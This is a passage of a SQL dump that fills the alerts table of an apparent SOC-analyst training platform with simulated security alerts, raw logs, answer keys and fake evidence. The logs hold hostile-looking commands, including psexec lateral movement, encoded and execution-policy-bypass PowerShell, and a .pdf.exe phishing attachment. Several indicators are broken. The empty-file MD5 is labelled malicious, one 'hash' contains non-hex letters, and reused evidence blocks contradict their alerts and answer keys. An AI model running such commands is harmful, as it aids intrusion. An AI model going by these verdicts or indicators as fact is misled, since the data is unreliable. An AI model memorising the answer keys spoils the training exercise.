192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"server04\\\",\\\"failed_attempts\\\":47}\"},{\"timestamp\":\"2026-03-02T13:53:06.789Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"server04\\\",\\\"failed_attempts\\\":47}\"},{\"timestamp\":\"2026-03-02T13:52:06.789Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"server04\\\",\\\"failed_attempts\\\":47}\"},{\"timestamp\":\"2026-03-02T13:51:06.789Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"server04\\\",\\\"failed_attempts\\\":47}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1318, 'Phishing Attempt Detected via Spoofed Domain', 'medium', 'Proofpoint', 'A phishing email was detected containing a link to a spoofed domain designed to mimic a legitimate financial institution.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-01T12:14:33Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.75\",\"dst_ip\":\"192.168.1.50\",\"username\":\"kthompson\",\"hostname\":\"laptop01\",\"email_sender\":\"alert@secure-finance.com\",\"url\":\"http://secure-f1nance.com/login\"}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 254 times for phishing activity\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-f1nance.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL identified as part of phishing campaign\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"alert@secure-finance.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email sender domain closely resembles a legitimate domain\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The phishing URL and spoofed email domain confirm the alert as a true positive.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt Detected via Spoofed Domain\",\"date\":\"2026-03-02T13:55:06.792Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1319, 'Legitimate Remote Access Tool Misidentified as Malicious', 'low', 'Wazuh', 'A legitimate remote access tool was flagged as malicious due to its use of obfuscation techniques.', 'Malware', 'T1219', 0, 'New', NULL, '{\"timestamp\":\"2026-03-01T16:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"172.16.0.100\",\"username\":\"it_support\",\"hostname\":\"support-pc\",\"command_line\":\"remotesupport.exe /connect /obfuscate\"}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"remotesupport.exe /connect /obfuscate\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Command line typical for internal IT operations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command line execution belongs to a known legitimate remote support tool, confirming the false positive.\"}', 'Expert', 'TI', 9, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.800Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"172.16.0.100\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"command_line\\\":\\\"remotesupport.exe /connect /obfuscate\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.800Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"172.16.0.100\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"command_line\\\":\\\"remotesupport.exe /connect /obfuscate\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.800Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"172.16.0.100\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"command_line\\\":\\\"remotesupport.exe /connect /obfuscate\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.800Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"172.16.0.100\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"command_line\\\":\\\"remotesupport.exe /connect /obfuscate\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.800Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"172.16.0.100\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"command_line\\\":\\\"remotesupport.exe /connect /obfuscate\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1320, 'Detected Fast-Flux DNS Activity from Internal Server', 'medium', 'Splunk', 'An internal server was observed engaging in fast-flux DNS activity, commonly associated with botnet behavior.', 'DNS Anomaly', 'T1090', 0, 'New', NULL, '{\"timestamp\":\"2026-03-01T13:45:12Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.85\",\"username\":\"system\",\"hostname\":\"dns-server\",\"domain\":\"fluxdns.example.com\"}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of DNS server\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"fluxdns.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Domain used for legitimate testing purposes\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"dns_anomaly\",\"analysis_notes\":\"The activity was traced back to a legitimate testing process, confirming the false positive.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.802Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T13:45:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"dns-server\\\",\\\"domain\\\":\\\"fluxdns.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.802Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T13:45:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"dns-server\\\",\\\"domain\\\":\\\"fluxdns.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.802Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T13:45:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"dns-server\\\",\\\"domain\\\":\\\"fluxdns.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.802Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T13:45:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"dns-server\\\",\\\"domain\\\":\\\"fluxdns.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.802Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T13:45:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"dns-server\\\",\\\"domain\\\":\\\"fluxdns.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1321, 'Subtle Indicators of Lateral Movement Detected', 'high', 'CrowdStrike', 'Detected subtle indicators of lateral movement within the network using PSExec and WMI, likely part of a larger APT attack.', 'Lateral Movement', 'T1021', 1, 'New', NULL, '{\"timestamp\":\"2026-03-01T07:29:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.40\",\"dst_ip\":\"192.168.1.41\",\"username\":\"svc_admin\",\"hostname\":\"server05\",\"command_line\":\"psexec \\\\\\\\192.168.1.41 -u svc_admin -p ******** cmd\"}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address initiating lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.1.41 -u svc_admin -p ******** cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution indicative of lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec and WMI in this context aligns with known lateral movement techniques, confirming the alert.\"}', 'Expert', 'TI', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1322, 'Initial Access: Phishing Campaign Detected', 'high', 'Email Gateway Logs', 'A phishing email has been detected targeting employees within key Israeli organizations. The email contains a malicious attachment designed to gain unauthorized access to the network.', 'Phishing', 'TA0001 - Initial Access', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T08:45:00Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.15\",\"src_email\":\"attacker@m0s3sstaff.com\",\"dst_email\":\"employee@israeli-org.co.il\",\"subject\":\"Urgent Update Required\",\"attachment\":{\"filename\":\"update-instructions.docx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36\",\"action\":\"Email delivered\",\"status\":\"Suspicious\"}', '2026-03-01 22:55:52', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@m0s3sstaff.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Email domain linked to Moses Staff APT\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malicious document\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Phishing Campaign Detected\",\"date\":\"2026-03-02T13:55:06.807Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1323, 'Execution: DCSrv Wiper Deployment', 'critical', 'Endpoint Detection Systems', 'Following successful initial access, the attackers deployed the DCSrv wiper malware on the targeted endpoint with the objective to destroy critical data and disrupt operations. This aligns with their politically-driven objectives to cause chaos within the target\'s infrastructure.', 'Malware Execution', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"1029384756\",\"hostname\":\"target-server1\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"username\":\"admin_user\",\"malware_name\":\"DCSrv Wiper\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\dcwiper.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"execution\",\"status\":\"success\",\"detection_method\":\"signature-based\",\"event_description\":\"Malware execution detected: DCSrv Wiper initiated on target-server1 by user admin_user from IP 203.0.113.45.\"}', '2026-03-01 22:55:52', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP involved in multiple cyber attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the DCSrv Wiper malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"dcwiper.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Executable file used by DCSrv 
Wiper.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account involved in unauthorized activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1324, 'Data Exfiltration: Sensitive Data Leak', 'critical', 'Network Traffic Analysis', 'The final phase of the attack executed by the threat actor Moses Staff involved the exfiltration of sensitive data from Israeli organizations. The data is set to be used for public release and political leverage.', 'Data Exfiltration', 'T1041', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:34:56Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"src_port\":44322,\"dst_port\":443,\"filename\":\"Sensitive_Company_Data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"data_exfiltration\",\"notes\":\"Large upload detected to known malicious IP.\"}', '2026-03-01 22:55:52', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected in previous data leaks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Sensitive_Company_Data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of exfiltrated data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User account active and 
verified.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1325, 'Suspicious Dropbox API Activity Detected', 'medium', 'Network Traffic Analysis', 'IndigoZebra initiates their campaign by abusing the Dropbox API to establish a communication channel with compromised systems, bypassing traditional security measures.', 'Initial Access', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:35Z\",\"src_ip\":\"192.168.1.15\",\"dest_ip\":\"96.45.183.149\",\"dest_domain\":\"api.dropboxapi.com\",\"method\":\"POST\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\",\"filename\":\"dbx_comm_payload.bin\",\"file_hash\":\"d2d2d2e5a5a5f5f5g5g5h5h5i5i5j5j5\",\"username\":\"indigo_user\",\"session_id\":\"6F2A1B3C4D5E6F7G8H9I0J1K2L3M4N5O\"}', '2026-03-01 22:55:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"96.45.183.149\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"api.dropboxapi.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Public Domain Info\",\"verdict\":\"clean\",\"details\":\"Legitimate Dropbox API domain\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"dbx_comm_payload.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized payload file\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d2d2d2e5a5a5f5f5g5g5h5h5i5i5j5j5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known IndigoZebra malware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"indigo_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account suspected of 
being compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1326, 'xCaon Malware Execution on Host System', 'high', 'Endpoint Detection and Response (EDR)', 'The xCaon malware was executed on the host system, indicating the start of a potential system compromise. This step involves the execution of the malicious payload aimed at gaining control over the system.', 'Execution', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"host_ip\":\"192.168.1.10\",\"attacker_ip\":\"203.0.113.45\",\"executed_file\":\"C:\\\\Users\\\\Public\\\\xCaonPayload.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"john.doe\",\"process_id\":1234,\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File xCaonPayload.exe\",\"event_id\":4688,\"event_description\":\"A new process has been created.\"}', '2026-03-01 22:55:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the host system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with multiple 